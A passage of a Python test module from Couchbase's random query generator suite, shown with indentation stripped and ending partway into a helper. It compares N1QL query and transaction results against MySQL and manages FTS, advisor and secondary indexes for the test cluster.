from membase.api.rest_client import RestConnection, Bucket
from couchbase_helper.tuq_helper import N1QLHelper
from .rqg_query_helper import RQGQueryHelper
from remote.remote_util import RemoteMachineShellConnection
import random
from itertools import combinations
import shutil
from os import listdir
from os.path import isfile, join
import traceback
from .rqg_postgres_client import RQGPostgresClient
from membase.api.exception import CBQError
from fts.random_query_generator.rand_query_gen import FTSFlexQueryGenerator
from pytests.fts.fts_base import FTSIndex
from pytests.fts.random_query_generator.rand_query_gen import DATASET
from deepdiff import DeepDiff
from pytests.fts.fts_base import CouchbaseCluster
import uuid
import re
class BaseRQGTests(BaseTestCase):
def setUp(self):
try:
super(BaseRQGTests, self).setUp()
self.log.info("============== RQG Setup Has Started ==============")
self.client_map = {}
self.check_covering_index = self.input.param("check_covering_index", True)
self.skip_setup_cleanup = True
self.crud_ops = self.input.param("crud_ops", False)
self.use_fts = self.input.param("use_fts", False)
self.use_sdk = self.input.param("use_sdk", False)
self.use_analytics = self.input.param("use_analytics", False)
self.shell = RemoteMachineShellConnection(self.master)
self.ansi_joins = self.input.param("ansi_joins", False)
self.with_let = self.input.param("with_let", False)
self.ansi_transform = self.input.param("ansi_transform", False)
self.prepared = self.input.param("prepared", False)
self.hash_joins = self.input.param("hash_joins", False)
self.create_secondary_meta_indexes = self.input.param("create_secondary_meta_indexes", False)
self.aggregate_pushdown = self.input.param("aggregate_pushdown", False)
self.create_secondary_ansi_join_indexes = self.input.param("create_secondary_ansi_join_indexes", False)
self.remove_alias = self.input.param("remove_alias", True)
self.skip_cleanup = self.input.param("skip_cleanup", False)
self.build_secondary_index_in_seq = self.input.param("build_secondary_index_in_seq", False)
self.number_of_buckets = self.input.param("number_of_buckets", 5)
self.crud_type = self.input.param("crud_type", "update")
self.populate_with_replay = self.input.param("populate_with_replay", False)
self.use_default_collection = self.input.param("use_default_collection", False)
self.use_query_context = self.input.param("use_query_context", False)
self.crud_batch_size = self.input.param("crud_batch_size", 1)
self.record_failure = self.input.param("record_failure", False)
self.failure_record_path = self.input.param("failure_record_path", "/tmp")
self.use_mysql = self.input.param("use_mysql", False)
self.use_postgres = self.input.param("use_postgres", False)
self.initial_loading_to_cb = self.input.param("initial_loading_to_cb", True)
self.change_bucket_properties = self.input.param("change_bucket_properties", False)
self.database = self.input.param("database", "flightstats")
self.merge_operation = self.input.param("merge_operation", False)
self.load_copy_table = self.input.param("load_copy_table", False)
self.user_id = self.input.param("user_id", "root")
self.user_cluster = self.input.param("user_cluster", "Administrator")
self.password = self.input.param("password", "")
self.password_cluster = self.input.param("password_cluster", "password")
self.generate_input_only = self.input.param("generate_input_only", False)
self.using_gsi = self.input.param("using_gsi", True)
self.use_txns = self.input.param("use_txns", False)
self.num_txns = self.input.param("num_txns", 1)
self.reset_database = self.input.param("reset_database", True)
self.create_primary_index = self.input.param("create_primary_index", False)
self.create_secondary_indexes = self.input.param("create_secondary_indexes", False)
self.use_advisor = self.input.param("use_advisor", False)
self.items = self.input.param("items", 1000)
self.mysql_url = self.input.param("mysql_url", "localhost")
self.mysql_url = self.mysql_url.replace("_", ".")
self.gen_secondary_indexes = self.input.param("gen_secondary_indexes", False)
self.gen_gsi_indexes = self.input.param("gen_gsi_indexes", True)
self.n1ql_server = self.get_nodes_from_services_map(service_type="n1ql")
self.create_all_indexes = self.input.param("create_all_indexes", False)
self.concurreny_count = self.input.param("concurreny_count", 10)
self.total_queries = self.input.param("total_queries", None)
self.run_query_without_index_hint = self.input.param("run_query_without_index_hint", True)
self.run_query_with_primary = self.input.param("run_query_with_primary", False)
self.run_query_with_secondary = self.input.param("run_query_with_secondary", False)
self.run_explain_with_hints = self.input.param("run_explain_with_hints", False)
self.test_file_path = self.input.param("test_file_path", None)
self.secondary_index_info_path = self.input.param("secondary_index_info_path", None)
self.db_dump_path = self.input.param("db_dump_path", None)
self.input_rqg_path = self.input.param("input_rqg_path", None)
self.set_limit = self.input.param("set_limit", 0)
self.build_index_batch_size = self.input.param("build_index_batch_size", 1000)
self.query_count = 0
self.use_rest = self.input.param("use_rest", True)
self.ram_quota = self.input.param("ram_quota", 512)
self.drop_index = self.input.param("drop_index", False)
self.drop_bucket = self.input.param("drop_bucket", False)
self.dynamic_indexing = self.input.param("dynamic_indexing", False)
self.partitioned_indexes = self.input.param("partitioned_indexes", False)
self.pushdown = self.input.param("pushdown", False)
self.subquery = self.input.param("subquery", False)
self.drop_secondary_indexes = self.input.param("drop_secondary_indexes", True)
self.query_helper = self._initialize_rqg_query_helper()
self.n1ql_helper = self._initialize_n1ql_helper()
self.rest = RestConnection(self.master)
self.indexer_memQuota = self.input.param("indexer_memQuota", 1024)
self.teardown_mysql = self.use_mysql and self.reset_database and (not self.skip_cleanup)
self.keyword_list = self.query_helper._read_keywords_from_file("b/resources/rqg/n1ql_info/keywords.txt")
self.use_secondary_index = self.run_query_with_secondary or self.run_explain_with_hints
self.check_explain_plan = self.input.param("explain_plan", False)
self.index_limit = self.input.param("index_limit", 5)
self.float_round_level = self.input.param("float_round_level", 0)
self.delta = self.input.param("delta", 0)
self.window_function_test = self.input.param("window_function_test", False)
self.randomize = self.input.param("randomize", False)
self.advise_server = self.input.advisor
self.advise_buckets = ["bucket_01", "bucket_02", "bucket_03", "bucket_04", "bucket_05", "bucket_06", "bucket_07", "bucket_08", "bucket_09", "bucket_10"]
self.advise_dict={}
if self.input_rqg_path is not None:
self.secondary_index_info_path = self.input_rqg_path+"/index/secondary_index_definitions.txt"
self.db_dump_path = self.input_rqg_path+"/db_dump/database_dump.zip"
self.test_file_path = self.input_rqg_path+"/input/source_input_rqg_run.txt"
if self.initial_loading_to_cb:
self._initialize_cluster_setup()
if self.subquery:
self.items = 500
if not self.use_rest:
self._ssh_client = paramiko.SSHClient()
self._ssh_client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
self.os = self.shell.extract_remote_info().type.lower()
except Exception as ex:
self.log.info("============== RQG Setup Has Failed ==============")
traceback.print_exc()
self.assertTrue(False)
self.tearDown()
self.log.info("============== RQG Setup Has Completed ==============")
def tearDown(self):
try:
self.log.info("============== RQG BasTestCase Teardown Has Started ==============")
super(BaseRQGTests, self).tearDown()
self.log.info("============== RQG BasTestCase Teardown Has Completed ==============")
self.log.info("============== RQG Teardown Has Started ==============")
if hasattr(self, 'reset_database'):
if self.teardown_mysql:
client = RQGMySQLClient(database=self.database, host=self.mysql_url, user_id=self.user_id, password=self.password)
self.kill_mysql_processes(client)
client.drop_database(self.database)
except Exception as ex:
self.log.info("============== RQG Teardown Has Failed ==============")
self.log.info(ex)
self.log.info("============== RQG Teardown Has Completed ==============")
def kill_mysql_processes(self, client):
columns, rows = client._execute_query(query="select concat('KILL ',id,';') from information_schema.processlist where user='root' and time > 0;")
sql_result = client._gen_json_from_results(columns, rows)
for result in sql_result:
for key in list(result.keys()):
query = result[key]
# execute kill query
client._db_execute_query(query=query)
client.drop_database(self.database)
def create_fts_index(self, name, source_type='couchbase',
source_name=None, index_type='fulltext-index',
index_params=None, plan_params=None,
source_params=None, source_uuid=None, doc_count=1000):
"""Create fts index/alias
@param node: Node on which index is created
@param name: name of the index/alias
@param source_type : 'couchbase' or 'files'
@param source_name : name of couchbase bucket or "" for alias
@param index_type : 'fulltext-index' or 'fulltext-alias'
@param index_params : to specify advanced index mapping;
dictionary overriding params in
INDEX_DEFAULTS.BLEVE_MAPPING or
INDEX_DEFAULTS.ALIAS_DEFINITION depending on
index_type
@param plan_params : dictionary overriding params defined in
INDEX_DEFAULTS.PLAN_PARAMS
@param source_params: dictionary overriding params defined in
INDEX_DEFAULTS.SOURCE_CB_PARAMS or
INDEX_DEFAULTS.SOURCE_FILE_PARAMS
@param source_uuid: UUID of the source, may not be used
"""
self.cbcluster = CouchbaseCluster(name='cluster', nodes=self.servers, log=self.log)
index_params = {"default_analyzer": "keyword",
"default_mapping": {
"enabled": True,
"dynamic": True,
}
}
plan_params = {'numReplicas': 0}
fts_index = FTSIndex(
self.cbcluster,
name,
source_type,
source_name,
index_type,
index_params,
plan_params,
source_params,
source_uuid)
fts_index.create()
indexed_doc_count = 0
retry_count = 10
while indexed_doc_count < doc_count and retry_count > 0:
try:
self.sleep(10)
indexed_doc_count = fts_index.get_indexed_doc_count()
except KeyError as k:
continue
retry_count -= 1
if indexed_doc_count != doc_count:
self.fail(
"FTS indexing did not complete. FTS index count : {0}, Bucket count : {1}".format(indexed_doc_count,
doc_count))
def test_rqg(self):
try:
# Get Data Map
run_seed = random.seed(uuid.uuid4())
self.log.info("SEED: {0}".format(run_seed))
table_list = self.client._get_table_list()
table_map = self.client._get_values_with_type_for_fields_in_table()
if self.use_txns:
failures = {}
passes = 0
fails = 0
update_query_template_list = []
delete_query_template_list = []
select_query_template_list = []
i = 1
for table_name in table_list:
if self.use_fts:
fts_index = self.create_fts_index(name="default_index" + str(i), source_name=self.database+"_"+table_name)
i = i + 1
if self.use_txns:
results = self.n1ql_helper.run_cbq_query(query="CREATE PRIMARY INDEX ON {0}".format(self.database + "_" + table_name))
if self.remove_alias:
table_map = self.remove_aliases_from_table_map(table_map)
if self.use_analytics:
data = 'use Default;'
bucket_username = "cbadminbucket"
bucket_password = "password"
for bucket in self.buckets:
data = 'create dataset {1} on {0}; '.format(bucket.name,
bucket.name + "_shadow")
filename = "file.txt"
f = open(filename, 'w')
f.write(data)
f.close()
url = 'http://{0}:8095/analytics/service'.format(self.master.ip)
cmd = 'curl -s --data pretty=true --data-urlencode "statement@file.txt" ' + url + " -u " + bucket_username + ":" + bucket_password
os.system(cmd)
os.remove(filename)
data = 'connect link Local;'
filename = "file.txt"
f = open(filename, 'w')
f.write(data)
f.close()
url = 'http://{0}:8095/analytics/service'.format(self.master.ip)
cmd = 'curl -s --data pretty=true --data-urlencode "statement@file.txt" ' + url + " -u " + bucket_username + ":" + bucket_password
os.system(cmd)
os.remove(filename)
if self.crud_ops:
table_list.remove("copy_simple_table")
query_template_list = self.extract_query_templates()
if self.use_txns:
for query in query_template_list:
if "fields_asc_desc" in query[0]:
select_query_template_list.append(query[1])
elif "update" in query[0]:
update_query_template_list.append(query[1])
elif "delete" in query[0]:
delete_query_template_list.append(query[1])
random.shuffle(select_query_template_list)
random.shuffle(update_query_template_list)
random.shuffle(delete_query_template_list)
# Generate the query batches based on the given template file and the concurrency count
else:
if self.randomize:
random.shuffle(query_template_list)
batches = self.generate_batches(table_list, query_template_list)
result_queue = queue.Queue()
failure_queue = queue.Queue()
input_queue = queue.Queue()
# Run Test Batches
thread_list = []
start_test_case_number = 1
if self.crud_ops:
for table_name in table_list:
if len(batches[table_name]) > 0:
self._crud_ops_worker(batches[table_name], table_name, table_map, result_queue, failure_queue)
elif self.use_txns:
for x in range(0, self.num_txns):
rollback_exists = False
savepoints = []
txn_queries = []
savepoint = 0
test_batch = []
rollback_point = 0
select_batches = self.generate_batches(table_list, select_query_template_list)
update_batches = self.generate_batches(table_list, update_query_template_list)
delete_batches = self.generate_batches(table_list, delete_query_template_list)
i = 0
self.log.info("-----------------------------------------------------------------STARTING TRANSACTION txn {0}-----------------------------------------------------------------".format(x))
results = self.n1ql_helper.run_cbq_query(query="START TRANSACTION", txtimeout="4m")
txn_id = results['results'][0]['txid']
self.log.info("TXN ID {0}".format(txn_id))
txn_queries.append("START TRANSACTION")
while not (select_batches.empty() and update_batches.empty() and delete_batches.empty()):
# Split up the batches and send them to the worker threads
try:
select_batch = select_batches.get(False)
update_batch = update_batches.get(False)
delete_batch = delete_batches.get(False)
except Exception as ex:
self.log.error(str(ex))
break
random.seed(uuid.uuid4())
percentage = random.randint(1, 100)
if percentage <= 50:
query_type = random.choice(['select','select','select','select','select','select','update','update','update', 'update'])
if query_type == 'select':
test_batch = select_batch
elif query_type == 'update':
test_batch = update_batch
self.crud_type = "update"
elif query_type == 'delete':
test_batch = delete_batch
self.crud_type = "delete"
test_query_template_list = [test_data[list(test_data.keys())[0]] for test_data in test_batch]
table_name_description_map = {'simple_table': table_map['simple_table']}
# create strings for queries and indexes but doesnt send indexes to Couchbase
if query_type == 'update' or query_type == 'delete':
sql_n1ql_index_map_list = self.convert_crud_ops_query(table_name, test_query_template_list, table_name_description_map)
else:
sql_n1ql_index_map_list = self.client._convert_template_query_info(table_map=table_name_description_map,
n1ql_queries=test_query_template_list,
define_gsi_index=self.use_secondary_index,
aggregate_pushdown=self.aggregate_pushdown,
partitioned_indexes=self.partitioned_indexes,
ansi_joins=self.ansi_joins,
with_let=self.with_let)
for sql_n1ql_index_map in sql_n1ql_index_map_list:
if not query_type == 'select':
sql_n1ql_index_map["n1ql_query"] = sql_n1ql_index_map['n1ql_query'].replace("simple_table",
self.database + "_" + "simple_table")
if query_type == 'delete':
sql_n1ql_index_map['n1ql_query'] = sql_n1ql_index_map['n1ql_query'].split(";")[0] + " LIMIT 10;" + sql_n1ql_index_map['n1ql_query'].split(";")[1]
sql_n1ql_index_map['sql_query'] = sql_n1ql_index_map['sql_query'].split(";")[0] + " LIMIT 10;" + sql_n1ql_index_map['sql_query'].split(";")[1]
else:
sql_n1ql_index_map["n1ql"] = sql_n1ql_index_map['n1ql'].replace("simple_table", self.database+"_"+"simple_table")
# build indexes
if self.use_secondary_index:
self._generate_secondary_indexes_in_batches(sql_n1ql_index_map_list)
for test_case_input in sql_n1ql_index_map_list:
# if self.use_advisor:
# self.create_secondary_index(n1ql_query=test_case_input['n1ql'])
if not query_type == 'select':
self.n1ql_helper.run_cbq_query(query=test_case_input['n1ql_query'], txnid=txn_id)
txn_queries.append(test_case_input['sql_query'])
else:
self.n1ql_helper.run_cbq_query(query=test_case_input['n1ql'], txnid=txn_id)
txn_queries.append(test_case_input['sql'])
percentage2 = random.randint(1, 100)
if percentage2 <= 10:
savepoint = i
self.log.info("CREATING SAVEPOINT s{0}".format(savepoint))
results = self.n1ql_helper.run_cbq_query(query="SAVEPOINT s{0}".format(savepoint), txnid=txn_id)
txn_queries.append("SAVEPOINT s{0}".format(savepoint))
savepoints.append("s{0}".format(savepoint))
i = i + 1
if savepoints:
percentage3 = random.randint(1, 100)
if percentage3 <= 10:
rollback_point = random.randint(0, savepoint)
for txns in txn_queries:
if "ROLLBACK" in txns:
rollback_exists = True
break
if not rollback_exists:
self.log.info("ROLLING BACK")
results = self.n1ql_helper.run_cbq_query(query=f"ROLLBACK TO SAVEPOINT s{savepoint}", txnid=txn_id)
txn_queries.append(f"ROLLBACK TO SAVEPOINT s{savepoint}")
self.log.info("-----------------------------------------------------------------COMMITING TRANSACTION {0}-----------------------------------------------------------------".format(x))
results = self.n1ql_helper.run_cbq_query(query="COMMIT TRANSACTION", txnid=txn_id)
txn_queries.append("COMMIT")
self.log.info("txn {0} : {1}".format(x, txn_queries))
client = RQGMySQLClient(database=self.database, host=self.mysql_url, user_id=self.user_id,
password=self.password)
cursor = client.mysql_connector_client.cursor(buffered=True)
for sql_query in txn_queries:
cursor.execute(sql_query)
client.mysql_connector_client.commit()
n1ql_result = self.n1ql_helper.run_cbq_query('select bool_field1,char_field1,datetime_field1,decimal_field1,int_field1,primary_key_id,varchar_field1 FROM {0}'.format(self.database+"_"+"simple_table"))
columns, rows = client._execute_query(query='SELECT * FROM simple_table')
sql_result = client._gen_json_from_results(columns, rows)
client._close_connection()
diffs = DeepDiff(sql_result, n1ql_result['results'], ignore_order=True,
ignore_numeric_type_changes=True)
if diffs:
txn_no = 'txn {0}'.format(x)
failures[txn_no] = (diffs, txn_queries)
fails += 1
else:
passes += 1
else:
while not batches.empty():
# Split up the batches and send them to the worker threads
try:
test_batch = batches.get(False)
except Exception as ex:
break
test_query_template_list = [test_data[list(test_data.keys())[0]] for test_data in test_batch]
input_queue.put({"start_test_case_number": start_test_case_number,
"query_template_list": test_query_template_list})
start_test_case_number += len(test_query_template_list)
for table_name in table_list:
# Create threads based on number of tables (each table has its own thread)
self._rqg_worker(table_name, table_map, input_queue, result_queue,
failure_queue)
if not self.use_txns:
# Analyze the results for the failure and assert on the run
self.analyze_test(result_queue, failure_queue)
else:
self.log.info("Txns Passed: {0} Txn Failed: {1}".format(passes, fails))
if not fails == 0:
self.log.error("Failures were seen, the number of documents in the bucket is not the same in mysql and n1ql after transactions!")
for failure in failures:
self.log.info("----------------------------------------------------------------{0}-----------------------------------------------------------------------------".format(failure))
self.log.info("diffs: {0} txn: {1}".format(failures[failure][0], failure))
self.fail()
except Exception as ex:
traceback.print_exc()
self.log.info(ex)
self.assertFalse(True)
def _rqg_worker(self, table_name, table_map, input_queue, result_queue, failure_record_queue=None):
count = 0
table_name_description_map = {table_name: table_map[table_name]}
while True:
if self.total_queries <= self.query_count:
break
if not input_queue.empty():
data = input_queue.get()
start_test_case_number = data["start_test_case_number"]
query_template_list = data["query_template_list"]
# create strings for queries and indexes but doesnt send indexes to Couchbase
sql_n1ql_index_map_list = self.client._convert_template_query_info(table_map=table_name_description_map,
n1ql_queries=query_template_list,
define_gsi_index=self.use_secondary_index,
aggregate_pushdown=self.aggregate_pushdown,
partitioned_indexes=self.partitioned_indexes,
ansi_joins=self.ansi_joins,
with_let=self.with_let)
for sql_n1ql_index_map in sql_n1ql_index_map_list:
sql_n1ql_index_map["n1ql"] = sql_n1ql_index_map['n1ql'].replace("simple_table", self.database+"_"+"simple_table")
# build indexes
if self.use_secondary_index:
self._generate_secondary_indexes_in_batches(sql_n1ql_index_map_list)
thread_list = []
test_case_number = start_test_case_number
for test_case_input in sql_n1ql_index_map_list:
t = threading.Thread(target=self._run_basic_test, args=(test_case_input, test_case_number, result_queue, failure_record_queue))
#self._run_basic_test(test_case_input, test_case_number, result_queue, failure_record_queue)
test_case_number += 1
t.daemon = True
t.start()
thread_list.append(t)
# Drop all the secondary Indexes
for t in thread_list:
t.join()
if self.use_secondary_index and self.drop_secondary_indexes:
self._drop_secondary_indexes_in_batches(sql_n1ql_index_map_list)
else:
count += 1
if count > 1000:
return
def n1ql_query_runner_wrapper(self, n1ql_query="", server=None, query_params={}, scan_consistency=None, verbose=True, query_context=None):
if self.use_advisor:
queries = n1ql_query.split(' UNION ')
for q in queries:
query = re.sub(r"^\((.*?)\)$", r"\1", q.strip())
self.create_secondary_index(n1ql_query=query)
if self.use_query_context:
result = self.n1ql_helper.run_cbq_query(query=n1ql_query, server=server, query_params=query_params,
scan_consistency=scan_consistency, verbose=verbose,query_context=query_context,use_sdk=self.use_sdk)
else:
result = self.n1ql_helper.run_cbq_query(query=n1ql_query, server=server, query_params=query_params, scan_consistency=scan_consistency, verbose=verbose,use_sdk=self.use_sdk)
return result
def prepare_advise_query(self, n1ql_query=""):
for bucket in self.advise_dict.keys():
n1ql_query = n1ql_query.replace(bucket, self.advise_dict[bucket])
n1ql_query = n1ql_query.replace("._default._default", '')
if self.use_query_context:
n1ql_query = n1ql_query.replace("_default", self.advise_dict[bucket])
n1ql_query = n1ql_query.replace("PREPARE", "")
return n1ql_query
def translate_index_statement(self, n1ql_query=""):
index_name = ""
index_bucket = ""
for key in self.advise_dict.keys():
n1ql_query = n1ql_query.replace(self.advise_dict[key], key)
# remote util shell strips all spaces out of returns, need to readd them
if not self.use_rest:
n1ql_query = n1ql_query.replace("CREATE", "CREATE ")
n1ql_query = n1ql_query.replace("INDEX", "INDEX ")
n1ql_query = n1ql_query.replace("ON", " ON ")
n1ql_query = n1ql_query.replace("(", " ( ")
n1ql_query = n1ql_query.replace(")", " ) ")
n1ql_query = n1ql_query.replace("`", "\`")
index_parts = n1ql_query.split("ON")
for statement in index_parts:
if "adv" in statement:
index_name = statement.replace("CREATE INDEX ", "").strip()
elif "`" in statement:
if not self.use_rest:
index_bucket = statement.split("(")[0].replace("\`", "").strip()
else:
index_bucket = statement.split("(")[0].replace("`", "").strip()
return n1ql_query,index_name,index_bucket
def create_secondary_index(self, n1ql_query=""):
use_partitioned = False
if "EXECUTE" not in n1ql_query:
if self.count_secondary_indexes() >= self.index_limit:
self.remove_all_secondary_indexes()
self.n1ql_helper.wait_for_all_indexes_online()
advise_query = self.prepare_advise_query(n1ql_query=n1ql_query)
advise_result = self.n1ql_helper.run_cbq_query(query="ADVISE " + advise_query,
server=self.n1ql_server)
if len(advise_result["results"][0]["advice"]["adviseinfo"]) == 0:
self.log.info("No advise for index")
return
if "index recommendation at this time" not in str(advise_result["results"][0]["advice"]["adviseinfo"]["recommended_indexes"]):
if "indexes" in advise_result["results"][0]["advice"]["adviseinfo"][
"recommended_indexes"].keys():
for index_statement_array in advise_result["results"][0]["advice"]["adviseinfo"]["recommended_indexes"]["indexes"]:
index_statement = index_statement_array["index_statement"]
if index_statement != "":
try:
prepared_index_statement, index_name, index_bucket = self.translate_index_statement(index_statement)
# insert randomization logic for partitioned vs non_partitioned indexes
chance_of_partitioned = random.randint(1, 100)
if chance_of_partitioned <= 30:
use_partitioned = True
self.log.info("Using partitioned index for this query: {0}".format(n1ql_query))
if self.use_txns:
if use_partitioned:
prepared_index_statement = prepared_index_statement + " PARTITION BY HASH(META().id)"
self.n1ql_helper.run_cbq_query(prepared_index_statement)
self.n1ql_helper._wait_for_index_online(index_bucket,index_name)
else:
if use_partitioned:
prepared_index_statement = prepared_index_statement + " PARTITION BY HASH(META().id)"
self.log.info(prepared_index_statement)
self.n1ql_helper.run_cbq_query(prepared_index_statement)
self.n1ql_helper._wait_for_index_online(index_bucket,index_name)
except CBQError as ex:
if "already exists" in str(ex) or "alreadyexists" in str(ex):
continue
if "covering_indexes" in advise_result["results"][0]["advice"]["adviseinfo"][
"recommended_indexes"].keys():
for index_statement_array in advise_result["results"][0]["advice"]["adviseinfo"]["recommended_indexes"]["covering_indexes"]:
index_statement = index_statement_array["index_statement"]
if index_statement != "":
try:
prepared_index_statement, index_name, index_bucket = self.translate_index_statement(index_statement)
chance_of_partitioned = random.randint(1, 100)
if chance_of_partitioned <= 30:
use_partitioned = True
self.log.info("Using partitioned index for this query: {0}".format(n1ql_query))
if self.use_txns:
if use_partitioned:
prepared_index_statement = prepared_index_statement + " PARTITION BY HASH(META().id)"
self.n1ql_helper.run_cbq_query(prepared_index_statement)
self.n1ql_helper._wait_for_index_online(index_bucket,index_name)
else:
if use_partitioned:
prepared_index_statement = prepared_index_statement + " PARTITION BY HASH(META().id)"
self.log.info(prepared_index_statement)
self.n1ql_helper.run_cbq_query(prepared_index_statement)
self.n1ql_helper._wait_for_index_online(index_bucket,index_name)
except CBQError as ex:
if "already exists" in str(ex) or "alreadyexists" in str(ex):
continue
def count_secondary_indexes(self):
count = self.n1ql_helper.run_cbq_query("select count(*) from system:indexes")
return int(count["results"][0]["$1"])
def remove_all_secondary_indexes(self):
self.n1ql_helper.drop_all_indexes()
def _run_basic_test(self, query_test_map, test_case_number, result_queue, failure_record_queue=None):
n1ql_query = query_test_map["n1ql"]
sql_query = query_test_map["sql"]
indexes = query_test_map["indexes"]
expected_result = query_test_map["expected_result"]
sql_query, n1ql_query = self.handle_limit_offset(sql_query, n1ql_query)
n1ql_query = self.handle_n1ql_table_name(n1ql_query)
sql_query, n1ql_query, aggregate = self.handle_subquery(sql_query, n1ql_query)
n1ql_query = self.handle_hash_join(n1ql_query)
self.log.info(" <<<<<<<<<<<<<<<<<<<<<<<<<<<< BEGIN RUNNING TEST {0} >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>".format(
test_case_number))
# results dict
result_run = dict()
result_run["n1ql_query"] = n1ql_query
result_run["sql_query"] = sql_query
result_run["test_case_number"] = test_case_number
# create a randomized set of params to pass to run_queries_and verify, decide prepared or not, partitioned or not, and execution type
# store these params in a dictionary (possibly extend result_run to contain these choices
if self.ansi_transform:
result = self._run_explain_queries(n1ql_query=n1ql_query, keyword="u'outer':u'True'", present=False)
result_run.update(result)
if self.check_explain_plan:
result_run['check_explain_plan'] = self._check_explain_plan_for_secondary_index(n1ql_query=n1ql_query);
# run the query
result_run["run_query_without_index_hint"] = self._run_queries_and_verify(aggregate=aggregate,
subquery=self.subquery,
n1ql_query=n1ql_query,
sql_query=sql_query,
expected_result=expected_result)
if expected_result is None:
expected_result = self._gen_expected_result(sql_query, test_case_number)
query_test_map["expected_result"] = expected_result
if self.set_limit > 0 and n1ql_query.find("DISTINCT") > 0:
result_limit = self.query_helper._add_limit_to_query(n1ql_query, self.set_limit)
result_run["run_query_with_limit"] = self._run_queries_and_verify(aggregate=aggregate,
subquery=self.subquery,
n1ql_query=result_limit,
sql_query=sql_query,
expected_result=expected_result)
if self.run_query_with_primary:
index_info = [{"name": "`#primary`", "type": "GSI"}]
n1ql_query_with_hints = self.query_helper._add_index_hints_to_query(n1ql_query, index_info)
result_run["run_query_with_primary"] = self._run_queries_and_verify(aggregate=aggregate,
subquery=self.subquery,
n1ql_query=n1ql_query_with_hints,
sql_query=sql_query,
expected_result=expected_result)
if self.aggregate_pushdown == "primary" and not self.with_let:
result_run["aggregate_explain_check::#primary"] = self._run_query_with_pushdown_check(n1ql_query,
index_info)
if self.run_query_with_secondary:
for index_name in list(indexes.keys()):
n1ql_query_with_hints = self.query_helper._add_index_hints_to_query(n1ql_query, [indexes[index_name]])
result_run["run_query_with_index_name::{0}" + str(index_name)] = self._run_queries_and_verify(
aggregate=aggregate,
subquery=self.subquery,
n1ql_query=n1ql_query_with_hints,
sql_query=sql_query,
expected_result=expected_result)
if self.run_explain_with_hints:
result = self._run_queries_with_explain(n1ql_query, indexes)
result_run.update(result)
if self.aggregate_pushdown and not self.with_let:
for index_name in list(indexes.keys()):
result_run["aggregate_explain_check::" + str(index_name)] = self._run_query_with_pushdown_check(
n1ql_query,
indexes[index_name])
if self.ansi_joins and self.hash_joins:
self._verify_query_with_hash_joins(n1ql_query)
result_queue.put(result_run)
self._check_and_push_failure_record_queue(result_run, query_test_map, failure_record_queue)
self.query_count += 1
self.log.info(" <<<<<<<<<<<<<<<<<<<<<<<<<<<< END RUNNING TEST {0} >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>".format(test_case_number))
def _crud_ops_worker(self, list_info, table_name, table_map, result_queue=None, failure_record_queue=None):
table_name_map = {table_name: table_map[table_name]}
for test_data in list_info:
test_case_number = list(test_data.keys())[0]
test_data = test_data[test_case_number]
data_info = self.convert_crud_ops_query(table_name, [test_data], table_name_map)
verification_query = "SELECT * from {0} where primary_key_id is not null ORDER by primary_key_id".format(table_name)
self._run_basic_crud_test(data_info[0], verification_query, test_case_number, result_queue, failure_record_queue, table_name=table_name)
self._populate_delta_buckets(table_name)
self.wait_for_num_items(table_name, 1000)
def remove_aliases_from_table_map(self, table_map):
for key in list(table_map.keys()):
if "alias_name" in list(table_map[key].keys()):
table_map[key].pop("alias_name")
return table_map
def extract_query_templates(self):
file_paths = self.test_file_path.split(":")
query_template_list = []
for file_path in file_paths:
file_path = self.unzip_template(file_path)
cur_queries_list = []
with open(file_path) as f:
cur_queries_list = f.readlines()
for q in cur_queries_list:
if self.use_txns:
query_template_list.append((file_path,q))
else:
query_template_list.append(q)
if self.total_queries is None:
self.total_queries = len(query_template_list)
return query_template_list
def generate_batches(self, table_list, query_template_list):
if self.crud_ops:
batches = {}
for table_name in table_list:
batches[table_name] = []
else:
batches = queue.Queue()
batch = []
count = 1
inserted_count = 0
test_case_number = 1
for template_query in query_template_list:
if self.crud_ops:
batches[table_list[test_case_number % (len(table_list))]].append({str(test_case_number): template_query})
else:
batch.append({str(test_case_number): template_query})
if count == self.concurreny_count:
inserted_count += len(batch)
batches.put(batch)
count = 1
batch = []
else:
count += 1
test_case_number += 1
if test_case_number > self.total_queries:
break
if not self.crud_ops:
if len(batch) > 0:
batches.put(batch)
return batches
def analyze_test(self, result_queue, failure_queue):
success, summary, result = self._test_result_analysis(result_queue)
self.log.info(result)
self.dump_failure_data(failure_queue)
self.assertTrue(success, summary)
def convert_crud_ops_query(self, table_name, data_info, table_name_map):
if self.crud_type == "update":
data_info = self.client_map[table_name]._convert_update_template_query_info(
table_map=table_name_map,
n1ql_queries=data_info)
elif self.crud_type == "delete":
data_info = self.client_map[table_name]._convert_delete_template_query_info(
table_map=table_name_map,
n1ql_queries=data_info)
elif self.crud_type == "merge_update":
data_info = self.client_map[table_name]._convert_update_template_query_info_with_merge(
source_table=self.database+"_"+"copy_simple_table",
target_table=table_name,
table_map=table_name_map,
n1ql_queries=data_info)
elif self.crud_type == "merge_delete":
data_info = self.client_map[table_name]._convert_delete_template_query_info_with_merge(
source_table=self.database+"_"+"copy_simple_table",
target_table=table_name,
table_map=table_name_map,
n1ql_queries=data_info)
return data_info
def wait_for_num_items(self, table, num_items):
num_items_reached = False
while not num_items_reached:
self.sleep(1)
query = "SELECT COUNT(*) from {0}".format(self.database+"_"+table)
result = self.n1ql_query_runner_wrapper(n1ql_query=query, server=self.n1ql_server)
if result["results"][0]["$1"] == num_items:
num_items_reached = True
def handle_limit_offset(self, sql_query, n1ql_query):
if "NUMERIC_VALUE1" in n1ql_query:
limit = random.randint(1, 30)
n1ql_query = n1ql_query.replace("NUMERIC_VALUE1", str(limit))
sql_query = sql_query.replace("NUMERIC_VALUE1", str(limit))
if limit < 10:
offset = limit - 2
else:
offset = limit - 10
if offset < 0:
offset = 0
n1ql_query = n1ql_query.replace("NUMERIC_VALUE2", str(offset))
sql_query = sql_query.replace("NUMERIC_VALUE2", str(offset))
self.log.info(" SQL QUERY :: {0}".format(sql_query))
self.log.info(" N1QL QUERY :: {0}".format(n1ql_query))
return sql_query, n1ql_query
def handle_n1ql_table_name(self, n1ql_query):
if (n1ql_query.find("simple_table") > 0) and ((self.database+"_"+"simple_table") not in n1ql_query):
n1ql_query = n1ql_query.replace("simple_table", self.database+"_"+"simple_table")
return n1ql_query
def handle_subquery(self, sql_query, n1ql_query):
aggregate = False
if self.subquery:
n1ql_query = n1ql_query.replace(self.database+"_"+"simple_table_2", "t_5.simple_table_2")
